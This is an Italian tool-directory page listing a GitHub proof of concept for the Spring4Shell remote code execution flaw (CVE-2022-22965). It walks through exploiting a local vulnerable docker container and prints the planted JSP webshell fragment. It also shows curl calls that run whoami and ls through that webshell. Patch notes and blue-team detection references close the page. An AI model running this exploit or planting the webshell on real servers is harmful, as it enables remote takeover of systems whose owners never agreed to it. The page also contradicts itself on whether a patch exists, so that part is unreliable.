Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SpringShell — Spring4Shell - Spring Core RCE - CVE-2022-22965 | Kitploit
Strumenti/GitHubGitHub/thegejr/springshell
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubthegejr/springshell

SpringShell

Spring4Shell - Spring Core RCE - CVE-2022-22965

Vedi Repository
131824 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Spring Core RCE - CVE-2022-22965

Dopo Spring Cloud, il 29 marzo, un'altra vulnerabilità pesante di Spring è esplosa su Internet: Spring Core RCE

Il 31 marzo Spring ha rilasciato nuove versioni che correggono la vulnerabilità. Vedi sezione Patching.

Il 31 marzo è stato finalmente assegnato un numero CVE alla vulnerabilità con un punteggio CVSS 9.8 (CRITICO)

Prova di Concetto

L'exploit è molto facile da usare, da qui il punteggio CVSS molto alto di 9.8.

Per testare la vulnerabilità puoi fare quanto segue.

Avvia un'immagine docker vulnerabile di Spring.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

Questo collega il Spring vulnerabile all'indirizzo localhost:8082.

Verifica che l'immagine sia avviata correttamente con curl

root@kitploit:~
curl http://localhost:8082

Dovrebbe essere restituita una risposta ok.

Ora sfruttiamo l'immagine vulnerabile!

root@kitploit:~
python3 exp.py --url http://localhost:8082

Dovrebbe essere restituita una risposta The vulnerability exists .....

Ora puoi sfruttare la vulnerabilità con curl

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

PoC di codifica in circolazione

L'exploit è stato caricato finora exp.py
PoC di codifica in circolazione
situazione imbarazzante

Patch

Spring ha ora rilasciato nuove versioni che risolvono questa CVE. Vedi annuncio di Spring.

Il commit che ha corretto la vulnerabilità

Impatto della vulnerabilità

  1. JDK versione 9 e successive
  2. Viene utilizzato Spring Framework o framework derivati

Suggerimento per la correzione del bug

Al momento, Spring non ha rilasciato ufficialmente una patch, si consiglia di abbassare la versione JDK come soluzione temporanea

Blue team

Yara

  • Florian Roth - WebShell di Spring4Shell

Sigma

  • Emanuele De Lucia - Creazione di webshell .jsp

SPLUNK

  • Alex John - Rilevamento SPL per Splunk
Scarica lo strumento